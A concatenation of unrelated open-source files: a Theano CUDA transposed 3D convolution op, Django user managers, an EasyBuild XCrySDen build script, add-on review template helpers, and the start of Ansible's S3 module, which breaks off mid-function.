PyErr_Format(PyExc_ValueError, "Reconstruction must have shape of at least [%%i,%%i,%%i] but RShape argument requests that it be [%%i,%%i,%%i]" , videoHeight, videoWidth, videoDur, RShape0, RShape 1, RShape2 );
%(fail)s
}
videoHeight = RShape0;
videoWidth = RShape1;
videoDur = RShape2;
}
}
//Allocate the reconstruction
npy_intp dims[5];
dims[0] = batchSize;
dims[4] = inputChannels;
dims[1] = videoHeight;
dims[2] = videoWidth;
dims[3] = videoDur;
if(!(%(R)s) || CudaNdarray_HOST_DIMS(%(R)s)[0]!=dims[0] ||
CudaNdarray_HOST_DIMS(%(R)s)[1]!=dims[1] ||
CudaNdarray_HOST_DIMS(%(R)s)[2]!=dims[2] ||
CudaNdarray_HOST_DIMS(%(R)s)[3]!=dims[3] ||
CudaNdarray_HOST_DIMS(%(R)s)[4]!=dims[4]){
Py_XDECREF(%(R)s);
%(R)s = (CudaNdarray*)CudaNdarray_NewDims(5,dims);
if (!(%(R)s)) {
PyErr_Format(PyExc_MemoryError,"Could not allocate R");
%(fail)s;
}
}
cudaMemset(CudaNdarray_DEV_DATA(%(R)s), 0, 4 * batchSize * inputChannels * videoHeight * videoWidth * videoDur);
{ // for fail
bool out_contiguous = CudaNdarray_is_c_contiguous(%(R)s);
int version = -1;
int verbose = 0;
bool subsample =(dr>1)||(dc>1)||(dt>1);
bool b_strided = (CudaNdarray_HOST_STRIDES(%(b)s)[0]!=1) && !(CudaNdarray_HOST_STRIDES(%(b)s)[0]==0 && outputChannels==1);
printf("b stride0=%%d\\n",CudaNdarray_HOST_STRIDES(%(b)s)[0]);
bool work_complete = false;
const int ws4 = CudaNdarray_HOST_STRIDES(%(W)s)[4];
const int ws3 = CudaNdarray_HOST_STRIDES(%(W)s)[3];
const int ws2 = CudaNdarray_HOST_STRIDES(%(W)s)[2];
const int ws1 = CudaNdarray_HOST_STRIDES(%(W)s)[1];
const int ws0 = CudaNdarray_HOST_STRIDES(%(W)s)[0];
const int hs4 = CudaNdarray_HOST_STRIDES(%(H)s)[4];
const int hs3 = CudaNdarray_HOST_STRIDES(%(H)s)[3];
const int hs2 = CudaNdarray_HOST_STRIDES(%(H)s)[2];
const int hs1 = CudaNdarray_HOST_STRIDES(%(H)s)[1];
const int hs0 = CudaNdarray_HOST_STRIDES(%(H)s)[0];
if(out_contiguous && (version==0||version==-1) && outputDur<=512 && !work_complete){
//conv_transp_rows_stack
dim3 grid(batchSize * inputChannels, videoHeight * videoWidth);
dim3 threads(videoDur);
HERE
int shared_size=0;
conv_transp_rows_stack<<<grid, threads, shared_size>>>(
CudaNdarray_DEV_DATA(%(H)s), CudaNdarray_DEV_DATA(%(W)s), CudaNdarray_DEV_DATA(%(b)s), CudaNdarray_DEV_DATA(%(R)s),
videoHeight, videoWidth, videoDur,
filterHeight, filterWidth, filterDur,
outputHeight, outputWidth, outputDur,
outputChannels, inputChannels,
dr,dc,dt,
hs3,hs2,hs1,hs4,hs0,
ws3,ws2,ws1,ws4,ws0,
CudaNdarray_HOST_STRIDES(%(b)s)[0]);
CNDA_THREAD_SYNC;
cudaError_t sts = cudaGetLastError();
if (cudaSuccess == sts)
{
work_complete = true;
if (verbose>1) printf("threads.x=%%i, threads.y=%%i, grid.x=%%i, grid.y=%%i, shared_size=%%i, nb_threads=%%i\\n", threads.x, threads.y, grid.x, grid.y, shared_size, threads.x * threads.y);
if (verbose) printf("INFO: used 'conv_transp_rows_stack' version\\n");
}
else
{
if (verbose) printf("threads.x=%%i, threads.y=%%i, grid.x=%%i, grid.y=%%i, shared_size=%%i, nb_threads=%%i\\n", threads.x, threads.y, grid.x, grid.y, shared_size, threads.x * threads.y);
if (verbose) printf("ERROR: all implementations failed for GpuConvTransp3D! (%%s)",cudaGetErrorString(sts));
PyErr_Format(PyExc_RuntimeError, "ERROR: all implementations failed for GpuConvTransp3D! (%%s)",
cudaGetErrorString(sts));
%(fail)s
}
}
if(!work_complete){
PyErr_Format(PyExc_RuntimeError, "ERROR: no implementations executed for this GpuConvTransp3D! out_contiguous=%%d b_strided=%%d outputDur=%%d",
out_contiguous,b_strided,outputDur);
%(fail)s
}
}}}}}} // for fail
///////////// < /code generated by GpuConvTransp3D >
"""
return strutil.render_string(codeSource, locals())
def c_support_code_apply(self, node, nodename):
# This code is not sensitive to the ignore_border flag.
# It runs for every position in the output z, and then computes the gradient for the
# input pixels that were downsampled to that z-position.
codeSource = """
__global__ void
//thread block size = videoDur
//grid block size =(batchSize * inputChannels, videoHeight * videoWidth)
//
conv_transp_rows_stack( float* H, float* kern, float* bias, float* R,
int img_len, int img_wid, int img_dur,
int kern_len, int kern_wid, int kern_dur,
int H_len, int H_wid, int H_dur,
int nkern, int nstack,
int dr, int dc, int dt,
int H_stride_frame, int H_stride_col, int H_stride_row,
int H_stride_stack, int H_stride_batch,
int kern_stride_frame, int kern_stride_col, int kern_stride_row,
int kern_stride_stack, int kern_stride_nkern,
int bias_stride)
{
int __shared__ batch_id, stack_id;
float __shared__ *d_img, *d_kern;
batch_id= blockIdx.x/nstack;
stack_id = blockIdx.x - batch_id*nstack;
const int R_row = blockIdx.y/img_wid;
const int R_col = blockIdx.y%img_wid;
const int R_frame=threadIdx.x;
const int r = R_row;
const int c = R_col;
const int t = R_frame;
const int ftc = max(0, int(ceil(float(t-kern_dur +1 )/float(dt))));
const int fcc = max(0, int(ceil(float(c-kern_wid +1)/float(dc))));
int rc = max(0, int(ceil(float(r-kern_len+1)/float(dr))));
float sum = 0;
while(rc < H_len){
int rk = r - rc * dr;
if(rk < 0)
break;
int cc = fcc;
while( cc < H_wid){
int ck = c - cc * dc;
if(ck < 0)
break;
int tc = ftc;
while(tc < H_dur){
int tk = t - tc * dt;
if(tk < 0)
break;
//R[i,j,r,c,t] += numpy.dot(W[:,j,rk,ck,tk], H[i,:,rc,cc,tc] )
for(int q=0;q<nkern;q++){
sum += kern[q*kern_stride_nkern+stack_id*kern_stride_stack+rk*kern_stride_row+ck*kern_stride_col+tk*kern_stride_frame]*
H[batch_id*H_stride_batch+q*H_stride_stack+rc*H_stride_row+cc*H_stride_col+tc*H_stride_frame];
}
tc += 1;
}
cc += 1;
}
rc += 1;
}
R[batch_id*nstack*img_len*img_wid*img_dur+//the good batch
stack_id+//the output image
R_row*img_wid*img_dur*nstack+//the output row
R_col*img_dur*nstack + //the output_col
R_frame*nstack] = sum + bias[stack_id*bias_stride];
}
"""
return codeSource
gpu_conv_transpd = GpuConvTransp3D()
@local_optimizer([ConvTransp3D])
def local_gpu_conv_transp3d(node):
if isinstance(node.op, ConvTransp3D):
if numpy.any([i.owner and isinstance(i.owner.op, HostFromGpu)
for i in node.inputs]):
if numpy.all([o.type.dtype == 'float32' for o in node.outputs]):
W, b, d, H, RShape = node.inputs
return [host_from_gpu(gpu_conv_transpd(W, b, d, H, RShape))]
# Not enabled by default as we don't want people to use it.
gpu_optimizer.register("local_gpu_conv_transp3d", local_gpu_conv_transp3d)
# If the input size wasn't a multiple of D we may need to cause some automatic padding to get the right size of reconstruction
def computeR(W, b, d, H, Rshape=None):
assert len(W.shape) == 5
assert len(H.shape) == 5
assert len(b.shape) == 1
assert len(d) == 3
outputChannels, inputChannels, filterHeight, filterWidth, filterDur = W.shape
batchSize, outputChannelsAgain, outputHeight, outputWidth, outputDur = H.shape
assert outputChannelsAgain == outputChannels
assert b.shape[0] == inputChannels
dr, dc, dt = d
assert dr > 0
assert dc > 0
assert dt > 0
videoHeight = (outputHeight-1) * dr + filterHeight
videoWidth = (outputWidth-1) * dc + filterWidth
videoDur = (outputDur-1) * dt + filterDur
if Rshape is not None and Rshape[0] != -1:
if Rshape[0] < videoHeight:
print((Rshape[0], videoHeight))
assert False
assert Rshape[1] >= videoWidth
assert Rshape[2] >= videoDur
# print "setting video size to Rshape = "+str(Rshape)
videoHeight, videoWidth, videoDur = Rshape
# else:
# print "No Rshape passed in"
# print "video size: "+str((videoHeight, videoWidth, videoDur))
R = numpy.zeros( (batchSize, inputChannels, videoHeight,
videoWidth, videoDur ) , dtype=H.dtype)
# R[i,j,r,c,t] = b_j + sum_{rc,rk | d \circ rc + rk = r} sum_{cc,ck | ...} sum_{tc,tk | ...} sum_k W[k, j, rk, ck, tk] * H[i,k,rc,cc,tc]
for i in xrange(0, batchSize):
# print '\texample '+str(i+1)+'/'+str(batchSize)
for j in xrange(0, inputChannels):
# print '\t\tfeature map '+str(j+1)+'/'+str(inputChannels)
for r in xrange(0, videoHeight):
# print '\t\t\trow '+str(r+1)+'/'+str(videoHeight)
for c in xrange(0, videoWidth):
for t in xrange(0, videoDur):
R[i, j, r, c, t] = b[j]
ftc = max([0, int(numpy.ceil(float(t-filterDur + 1 )/float(dt))) ])
fcc = max([0, int(numpy.ceil(float(c-filterWidth + 1)/float(dc))) ])
rc = max([0, int(numpy.ceil(float(r-filterHeight+1)/float(dr))) ])
while rc < outputHeight:
rk = r - rc * dr
if rk < 0:
break
cc = fcc
while cc < outputWidth:
ck = c - cc * dc
if ck < 0:
break
tc = ftc
while tc < outputDur:
tk = t - tc * dt
if tk < 0:
break
R[i, j, r, c, t] += numpy.dot(W[:, j, rk, ck, tk], H[i, :, rc, cc, tc] )
tc += 1
"" # close loop over tc
cc += 1
"" # close loop over cc
rc += 1
"" # close loop over rc
"" # close loop over t
"" # close loop over c
"" # close loop over r
"" # close loop over j
"" # close loop over i
return R
|
from django.db import models
from django.contrib.auth.models import BaseUserManager
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
from django.core.mail import EmailMultiAlternatives
from django.template.loader import get_template
from django.template.context import Context
from django.conf import settings
from django.db.models import Q
from mail.tasks import send_mail
class UserManager(BaseUserManager):
"""
UserManager class.
"""
def _create_user(self, username, email, password, send_welcome_email=True, **kwargs):
now = timezone.now()
if username is None:
raise ValueError("Username must be set")
if email is None:
raise ValueError("Email must be set")
email = self.normalize_email(email)
user = self.model(
username=username,
email=email,
registration_date=now,
**kwargs
)
user.set_password(password)
user.save()
if send_welcome_email or not user.is_active:
from .models import UserCode
activation_code = UserCode.objects.generate_code(user, 'account_activation')
template_plain = get_template("user/mail/welcome.txt")
template_html = get_template("user/mail/welcome.html")
ctx = Context({
'the_user': user,
'site_url': settings.SITE_URL,
'activation_code': activation_code
})
content_plain = template_plain.render(ctx)
content_html = template_html.render(ctx)
mail = EmailMultiAlternatives(_("Welcome to the Study!"), content_plain, "[email protected]", [user.email])
mail.attach_alternative(content_html, 'text/html')
send_mail.apply_async(kwargs={
'mail': mail,
})
return user
def create_user(self, username, email, password, **kwargs):
"""
Create new user.
:param username: A user's name.
:type username: str
:param email: An user's email.
:type email: str
:param password: A user's password.
:type password: str
:param kwargs: An additional user kwargs.
:return: Instance of an user.
:rtype UserProfile
"""
kwargs.setdefault('is_staff', False)
kwargs.setdefault('is_superuser', False)
return self._create_user(username, email, password, **kwargs)
def create_superuser(self, username, email, password, **kwargs):
"""
Create new superuser.
:param username: A user's name.
:type username: str
:param email: An user's email.
:type email: str
:param password: A user's password.
:type password: str
:param kwargs: An additional user kwargs.
:return: Instance of an user.
:rtype UserProfile
"""
kwargs.setdefault('is_staff', True)
kwargs.setdefault('is_superuser', True)
kwargs.setdefault('is_active', True)
if kwargs.get('is_staff') is False:
raise ValueError("Superuser must have to set is_staff to True")
if kwargs.get('is_superuser') is False:
raise ValueError("Superuser must have to set is_superuser to True")
return self._create_user(username, email, password, **kwargs)
class UserLogEntryManager(models.Manager):
"""
UserLogEntryManager class.
"""
def add_entry(self, user, message, **kwargs):
"""
Add an entry to the specified user.
:param user: An user's instance.
:type user: UserProfile
:param message: A message of an log entry.
:type message: str
:param kwargs: An additional UserLogEntry kwargs.
:return: Instance of an log entry.
:rtype: UserLogEntry
"""
if user is None:
raise ValueError("User must be set")
if message is None:
raise ValueError("Message must be set")
log_entry = self.model(
user=user,
message=message,
**kwargs
)
log_entry.save()
return log_entry
class UserCodeManager(models.Manager):
def generate_code(self, user, type, expiration_date=None, **kwargs):
"""
Generate a code to the specified user.
:param user: An user's instance.
:type user: UserProfile
:param type: A type of code.
:type type: str
:param expiration_date: Date of code expiration. If None the code will never expire.
:type expiration_date: datetime
:param kwargs: An additional code kwargs.
:return: Instance of a UserCode
:rtype UserCode
"""
if user is None:
raise ValueError("User must be set")
if type is None:
raise ValueError("Type must be set")
code = self.model(
user=user,
type=type,
expiration_date=expiration_date,
**kwargs
)
code.save()
return code
def get_code(self, code, type, **kwargs):
"""
Get the UserCode instance.
:param code: A code.
:param type: A type.
:param user: An user's instance.
:return: Instance of a UserCode
:rtype UserCode
"""
if code is None:
raise ValueError("Code must be set")
if type is None:
raise ValueError("Type must be set")
return self.get(
Q(expiration_date=None) | Q(expiration_date__gte=timezone.now()),
is_used=False,
code=code,
type=type,
**kwargs
)
class UserNotificationManager(models.Manager):
def add_notification(self, user, message, **kwargs):
"""
Add notification to the specified user.
:param user: An user's instance
:type user: UserProfile
:param message: A notification message.
:type message: str
:param kwargs: An additional notification kwargs.
:return: A UserNotification instance
:rtype: UserNotification
"""
if user is None:
raise ValueError("User must be set")
if message is None:
raise ValueError("Message must be set")
notification = self.model(
user=user,
message=message,
**kwargs
)
notification.save()
return notification
|
##
# Copyright 2012 Ghent University
# Copyright 2012 Kenneth Hoste
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://vscentrum.be/nl/en),
# the Hercules foundation (http://www.herculesstichting.be/in_English)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# http://github.com/hpcugent/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for building and installing XCrySDen, implemented as an easyblock
"""
import fileinput
import os
import re
import shutil
import sys
from easybuild.easyblocks.generic.configuremake import ConfigureMake
from easybuild.tools.modules import get_software_root, get_software_version
class EB_XCrySDen(ConfigureMake):
"""Support for building/installing XCrySDen."""
def configure_step(self):
"""
Check required dependencies, configure XCrySDen build by patching Make.sys file
and set make target and installation prefix.
"""
# check dependencies
deps = ["Mesa", "Tcl", "Tk"]
for dep in deps:
if not get_software_root(dep):
self.log.error("Module for dependency %s not loaded." % dep)
# copy template Make.sys to apply_patch
makesys_tpl_file = os.path.join("system", "Make.sys-shared")
makesys_file = "Make.sys"
try:
shutil.copy2(makesys_tpl_file, makesys_file)
except OSError, err:
self.log.error("Failed to copy %s: %s" % (makesys_tpl_file, err))
# patch Make.sys
settings = {
'CFLAGS': os.getenv('CFLAGS'),
'CC': os.getenv('CC'),
'FFLAGS': os.getenv('F90FLAGS'),
'FC': os.getenv('F90'),
'TCL_LIB': "-L%s/lib -ltcl%s" % (get_software_root("Tcl"),
'.'.join(get_software_version("Tcl").split('.')[0:2])),
'TCL_INCDIR': "-I%s/include" % get_software_root("Tcl"),
'TK_LIB': "-L%s/lib -ltk%s" % (get_software_root("Tk"),
'.'.join(get_software_version("Tcl").split('.')[0:2])),
'TK_INCDIR': "-I%s/include" % get_software_root("Tk"),
'GLU_LIB': "-L%s/lib -lGLU" % get_software_root("Mesa"),
'GL_LIB': "-L%s/lib -lGL" % get_software_root("Mesa"),
'GL_INCDIR': "-I%s/include" % get_software_root("Mesa"),
'FFTW3_LIB': "-L%s %s -L%s %s" % (os.getenv('FFTW_LIB_DIR'), os.getenv('LIBFFT'),
os.getenv('LAPACK_LIB_DIR'), os.getenv('LIBLAPACK_MT')),
'FFTW3_INCDIR': "-I%s" % os.getenv('FFTW_INC_DIR'),
'COMPILE_TCLTK': 'no',
'COMPILE_MESA': 'no',
'COMPILE_FFTW': 'no',
'COMPILE_MESCHACH': 'no'
}
for line in fileinput.input(makesys_file, inplace=1, backup='.orig'):
# set config parameters
for (k, v) in settings.items():
regexp = re.compile('^%s(\s+=).*'% k)
if regexp.search(line):
line = regexp.sub('%s\\1 %s' % (k, v), line)
# remove replaced key/value pairs
settings.pop(k)
sys.stdout.write(line)
f = open(makesys_file, "a")
# append remaining key/value pairs
for (k, v) in settings.items():
f.write("%s = %s\n" % (k, v))
f.close()
self.log.debug("Patched Make.sys: %s" % open(makesys_file, "r").read())
# set make target to 'xcrysden', such that dependencies are not downloaded/built
self.cfg.update('makeopts', 'xcrysden')
# set installation prefix
self.cfg.update('preinstallopts', 'prefix=%s' % self.installdir)
# default 'make' and 'make install' should be fine
def sanity_check_step(self):
"""Custom sanity check for XCrySDen."""
custom_paths = {'files': ["bin/%s" % x for x in ["ptable", "pwi2xsf", "pwo2xsf", "unitconv", "xcrysden"]] +
["lib/%s-%s/%s" % (self.name.lower(), self.version, x)
for x in ["atomlab", "calplane", "cube2xsf", "fhi_coord2xcr", "fhi_inpini2ftn34",
"fracCoor", "fsReadBXSF", "ftnunit", "gengeom", "kPath", "multislab",
"nn", "pwi2xsf", "pwi2xsf_old", "pwKPath", "recvec", "savestruct",
"str2xcr", "wn_readbakgen", "wn_readbands", "xcrys", "xctclsh",
"xsf2xsf"]],
'dirs':[]
}
super(EB_XCrySDen, self).sanity_check_step(custom_paths=custom_paths)
def make_module_extra(self):
"""Set extra environment variables in module file."""
txt = super(EB_XCrySDen, self).make_module_extra()
for lib in ['Tcl', 'Tk']:
ver = '.'.join(get_software_version(lib).split('.')[0:2])
libpath = os.path.join(get_software_root(lib), 'lib', "%s%s" % (lib.lower(), ver))
txt += self.moduleGenerator.set_environment('%s_LIBRARY' % lib.upper(), libpath)
return txt
|
import jinja2
import jingo
from tower import ugettext as _
from access import acl
from reviews.models import ReviewFlag
from . import forms
@jingo.register.filter
def stars(num, large=False):
# check for 0.0 incase None was cast to a float. Should
# be safe since lowest rating you can give is 1.0
if num is None or num == 0.0:
return _('Not yet rated')
else:
num = min(5, int(round(num)))
t = jingo.env.get_template('reviews/impala/reviews_rating.html')
# These are getting renamed for contextual sense in the template.
return jinja2.Markup(t.render(rating=num, detailpage=large))
@jingo.register.function
def reviews_link(addon, collection_uuid=None, link_to_list=False):
t = jingo.env.get_template('reviews/reviews_link.html')
return jinja2.Markup(t.render(addon=addon, link_to_list=link_to_list,
collection_uuid=collection_uuid))
@jingo.register.function
def impala_reviews_link(addon, collection_uuid=None):
t = jingo.env.get_template('reviews/impala/reviews_link.html')
return jinja2.Markup(t.render(addon=addon,
collection_uuid=collection_uuid))
@jingo.register.inclusion_tag('reviews/mobile/reviews_link.html')
@jinja2.contextfunction
def mobile_reviews_link(context, addon):
c = dict(context.items())
c.update(addon=addon)
return c
@jingo.register.inclusion_tag('reviews/report_review.html')
@jinja2.contextfunction
def report_review_popup(context):
c = dict(context.items())
c.update(ReviewFlag=ReviewFlag, flag_form=forms.ReviewFlagForm())
return c
@jingo.register.inclusion_tag('reviews/edit_review.html')
@jinja2.contextfunction
def edit_review_form(context):
c = dict(context.items())
c.update(form=forms.ReviewForm())
return c
def user_can_delete_review(request, review):
"""Return whether or not the request.user can delete reviews.
People who can delete reviews:
* The original review author.
* Editors, but only if they aren't listed as an author of the add-on.
* Users in a group with "Users:Edit" privileges.
* Users in a group with "Addons:Edit" privileges.
TODO: Make this more granular when we have multiple reviewer types, e.g.
persona reviewers shouldn't be able to delete add-on reviews.
"""
is_editor = acl.check_reviewer(request)
is_author = review.addon.has_author(request.user)
return (
review.user_id == request.user.id or
not is_author and (
is_editor or
acl.action_allowed(request, 'Users', 'Edit') or
acl.action_allowed(request, 'Addons', 'Edit')))
@jingo.register.function
@jinja2.contextfunction
def check_review_delete(context, review):
return user_can_delete_review(context['request'], review)
|
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: s3
short_description: manage objects in S3.
description:
- This module allows the user to manage S3 buckets and the objects within them. Includes support for creating and deleting both objects and buckets, retrieving objects as files or strings and generating download links. This module has a dependency on python-boto.
version_added: "1.1"
options:
aws_access_key:
description:
- AWS access key id. If not set then the value of the AWS_ACCESS_KEY environment variable is used.
required: false
default: null
aliases: [ 'ec2_access_key', 'access_key' ]
aws_secret_key:
description:
- AWS secret key. If not set then the value of the AWS_SECRET_KEY environment variable is used.
required: false
default: null
aliases: ['ec2_secret_key', 'secret_key']
bucket:
description:
- Bucket name.
required: true
default: null
aliases: []
dest:
description:
- The destination file path when downloading an object/key with a GET operation.
required: false
aliases: []
version_added: "1.3"
encrypt:
description:
- When set for PUT mode, asks for server-side encryption
required: false
default: no
version_added: "2.0"
expiration:
description:
- Time limit (in seconds) for the URL generated and returned by S3/Walrus when performing a mode=put or mode=geturl operation.
required: false
default: 600
aliases: []
headers:
description:
- Custom headers for PUT operation, as a dictionary of 'key=value' and 'key=value,key=value'.
required: false
default: null
version_added: "2.0"
marker:
description:
- Specifies the key to start with when using list mode. Object keys are returned in alphabetical order, starting with key after the marker in order.
required: false
default: null
version_added: "2.0"
max_keys:
description:
- Max number of results to return in list mode, set this if you want to retrieve fewer than the default 1000 keys.
required: false
default: 1000
version_added: "2.0"
metadata:
description:
- Metadata for PUT operation, as a dictionary of 'key=value' and 'key=value,key=value'.
required: false
default: null
version_added: "1.6"
mode:
description:
- Switches the module behaviour between put (upload), get (download), geturl (return download url (Ansible 1.3+), getstr (download object as string (1.3+)), list (list keys (2.0+)), create (bucket), delete (bucket), and delobj (delete object).
required: true
default: null
aliases: []
object:
description:
- Keyname of the object inside the bucket. Can be used to create "virtual directories", see examples.
required: false
default: null
permission:
description:
- This option let's the user set the canned permissions on the object/bucket that are created. The permissions that can be set are 'private', 'public-read', 'public-read-write', 'authenticated-read'.
required: false
default: private
version_added: "2.0"
prefix:
description:
- Limits the response to keys that begin with the specified prefix for list mode
required: false
default: null
version_added: "2.0"
version:
description:
- Version ID of the object inside the bucket. Can be used to get a specific version of a file if versioning is enabled in the target bucket.
required: false
default: null
aliases: []
version_added: "2.0"
overwrite:
description:
- Force overwrite either locally on the filesystem or remotely with the object/key. Used with PUT and GET operations.
required: false
default: true
version_added: "1.2"
region:
description:
- "AWS region to create the bucket in. If not set then the value of the AWS_REGION and EC2_REGION environment variables are checked, followed by the aws_region and ec2_region settings in the Boto config file. If none of those are set the region defaults to the S3 Location: US Standard. Prior to ansible 1.8 this parameter could be specified but had no effect."
required: false
default: null
version_added: "1.8"
retries:
description:
- On recoverable failure, how many times to retry before actually failing.
required: false
default: 0
version_added: "2.0"
s3_url:
description:
- S3 URL endpoint for usage with Eucalypus, fakes3, etc. Otherwise assumes AWS
default: null
aliases: [ S3_URL ]
src:
description:
- The source file path when performing a PUT operation.
required: false
default: null
aliases: []
version_added: "1.3"
requirements: [ "boto" ]
author:
- "Lester Wade (@lwade)"
- "Ralph Tice (@ralph-tice)"
extends_documentation_fragment: aws
'''
EXAMPLES = '''
# Simple PUT operation
- s3: bucket=mybucket object=/my/desired/key.txt src=/usr/local/myfile.txt mode=put
# Simple GET operation
- s3: bucket=mybucket object=/my/desired/key.txt dest=/usr/local/myfile.txt mode=get
# Get a specific version of an object.
- s3: bucket=mybucket object=/my/desired/key.txt version=48c9ee5131af7a716edc22df9772aa6f dest=/usr/local/myfile.txt mode=get
# PUT/upload with metadata
- s3: bucket=mybucket object=/my/desired/key.txt src=/usr/local/myfile.txt mode=put metadata='Content-Encoding=gzip,Cache-Control=no-cache'
# PUT/upload with custom headers
- s3: bucket=mybucket object=/my/desired/key.txt src=/usr/local/myfile.txt mode=put [email protected]
# List keys simple
- s3: bucket=mybucket mode=list
# List keys all options
- s3: bucket=mybucket mode=list prefix=/my/desired/ marker=/my/desired/0023.txt max_keys=472
# Create an empty bucket
- s3: bucket=mybucket mode=create permission=public-read
# Create a bucket with key as directory, in the EU region
- s3: bucket=mybucket object=/my/directory/path mode=create region=eu-west-1
# Delete a bucket and all contents
- s3: bucket=mybucket mode=delete
# GET an object but dont download if the file checksums match
- s3: bucket=mybucket object=/my/desired/key.txt dest=/usr/local/myfile.txt mode=get overwrite=different
# Delete an object from a bucket
- s3: bucket=mybucket object=/my/desired/key.txt mode=delobj
'''
import os
import urlparse
from ssl import SSLError
try:
import boto
import boto.ec2
from boto.s3.connection import Location
from boto.s3.connection import OrdinaryCallingFormat
from boto.s3.connection import S3Connection
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
def key_check(module, s3, bucket, obj, version=None):
try:
bucket = s3.lookup(bucket)
key_check = bucket.get_key(obj, version_id=version)
except s3.provider.storage_response_error, e:
if version is not None and e.status == 400: # If a specified version doesn't exist a 400 is returned.
key_check = None
else:
module.fail_json(msg=str(e))
if key_check:
return True
else:
return False
def keysum(module, s3, bucket, obj, version=None):
bucket = s3.lookup(bucket)
key_check = bucket.get_key(obj, version_id=version)
if not key_check:
return None
md5_remote = key_check.etag[1:-1]
etag_multipart = '-' in md5_remote # Check for multipart, etag is not md5
if etag_multipart is True:
module.fail_json(msg="Files uploaded with multipart of s3 are not supported with checksum, unable to compute checksum.")
return md5_remote
def bucket_check(module, s3, bucket):
try:
result = s3.lookup(bucket)
except s3.provider.storage_response_error, e:
module.fail_json(msg= str(e))
if result:
return True
else:
return False
def create_bucket(module, s3, bucket, location=None):
if location is None:
location = Location.DEFAULT
try:
bucket = s3.create_bucket(bucket, location=location)
bucket.set_acl(module.params.get('permission'))
except s3.provider.storage_response_error, e:
module.fail_json(msg= str(e))
if bucket:
return True
def get_bucket(module, s3, bucket):
try:
return s3.lookup(bucket)
except s3.provider.storage_response_error, e:
module.fail_json(msg= str(e))
def list_keys(module, bucket_object, prefix, marker, max_keys):
all_keys = bucket_object.get_all_keys(prefix=prefix, marker=marker, max_keys=max_keys)
keys = [x.key for x in all_keys]
module.exit_json(msg="LIST operation complete", s3_keys=keys)
def delete_bucket(module, s3, bucket):
try:
bucket = s3.lookup(bucket)
bucket_contents = bucket.list()
bucket.delete_keys([key.name for key in bucket_contents])
bucket.delete()
return True
except s3.provider.storage_response_error, e:
module.fail_json(msg= str(e))
def delete_key(module, s3, bucket, obj):
try:
bucket = s3.lookup(bucket)
bucket.delete_key(obj)
module.exit_json(msg="Object deleted from bucket %s"%bucket, changed=True)
except s3.provider.storage_response_error, e:
module.fail_json(msg= str(e))
def create_dirkey(module, s3, bucket, obj):
try:
bucket = s3.lookup(bucket)
key = bucket.new_key(obj)
key.set_contents_from_string('')
module.exit_json(msg="Virtual directory %s created in bucket %s" % (obj, bucket.name), changed=True)
except s3.provider.storage_response_error, e:
module.fail_json(msg= str(e))
def path_check(path):
if os.path.exists(path):
return True
else:
return False
def upload_s3file(module, s3, bucket, obj, src, expiry, metadata, encrypt, headers):
try:
bucket = s3.lookup(bucket)
key = bucket.new_key(obj)
if metadata:
for meta_key in metadata.keys():
key.set_metadata(meta_key, metadata[meta_key])
key.set_contents_from_filename(src, encrypt_key=encrypt, headers=headers)
key.set_acl(module.params.get('permission'))
url = key.generate_url(expiry)
module.exit_json(msg="PUT operation complete", url=url, changed=True)
except s3.provider.storage_copy_error, e:
module.fail_json(msg= str(e))
def download_s3file(module, s3, bucket, obj, dest, retries, version=None):
# retries is the number of loops; range/xrange needs to be one
# more to get that count of loops.
bucket = s3.lookup(bucket)
key = bucket.get_key(obj, version_id=version)
for x in range(0, retries + 1):
try:
key.get_contents_to_filename(dest)
module.exit_json(msg="GET operation complete", changed=True)
except s3.provider.storage_copy_error, e:
module.fail_json(msg= str(e))
except SSLError as e:
# actually fail on last pass through the loop.
if x >= retries:
module.fail_json(msg="s3 download failed; %s" % e)
# otherwise, try again, this may be a transient timeout.
pass
def download_s3str(module, s3, bucket, obj, version=None):
try:
bucket = s3.lookup(bucket)
key = bucket.get_key(obj, version_id=version)
contents = key.get_contents_as_string()
module.exit_json(msg="GET operation complete", contents=contents, changed=True)
except s3.provider.storage_copy_error, e:
module.fail_json(msg= str(e))
def get_download_url(module, s3, bucket, obj, expiry, changed=True):
try:
bucket = s3.lookup(bucket)
key = bucket.lookup(obj)
url = key.generate_url(expiry)
module.exit_json(msg="Download url:", url=url, expiry=expiry, changed=changed)
except s3.provider.storage_response_error, e:
module.fail_json(msg= str(e))
def is_fakes3(s3_url):
""" Return True if s3_url has scheme fakes3:// """
if s3_url is not None:
return urlparse.urlparse(s3_url).scheme in ('fakes3', 'fakes3s')
else:
return False
def is_walrus(s3_url):
""" Return True if it's Walrus endpoint, not S3
We assume anything other than *.amazonaws.com is Walrus"""
if s3_url is not None:
o = urlparse.urlparse(s3_url)
return not o.hostname.endswith('amazonaws.com')
else:
return False
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
bucket = dict(required=True),
dest = dict(default=None),
encrypt = dict(default=True, type='bool'),
expiry = dict(default=600, aliases=['expiration']),
headers = dict(type='dict'),
marker = dict(default=None),
max_keys = dict(default=1000),
metadata = dict(type='dict'),
mode = dict(choices=['get', 'put', 'delete', 'create', 'geturl', 'getstr', 'delobj', 'list'], required=True),
object = dict(),
permission = dict(choices=['private', 'public-read', 'public-read-write', 'authenticated-read'], default='private'),
version = dict(default=None),
overwrite = dict(aliases=['force'], default='always'),
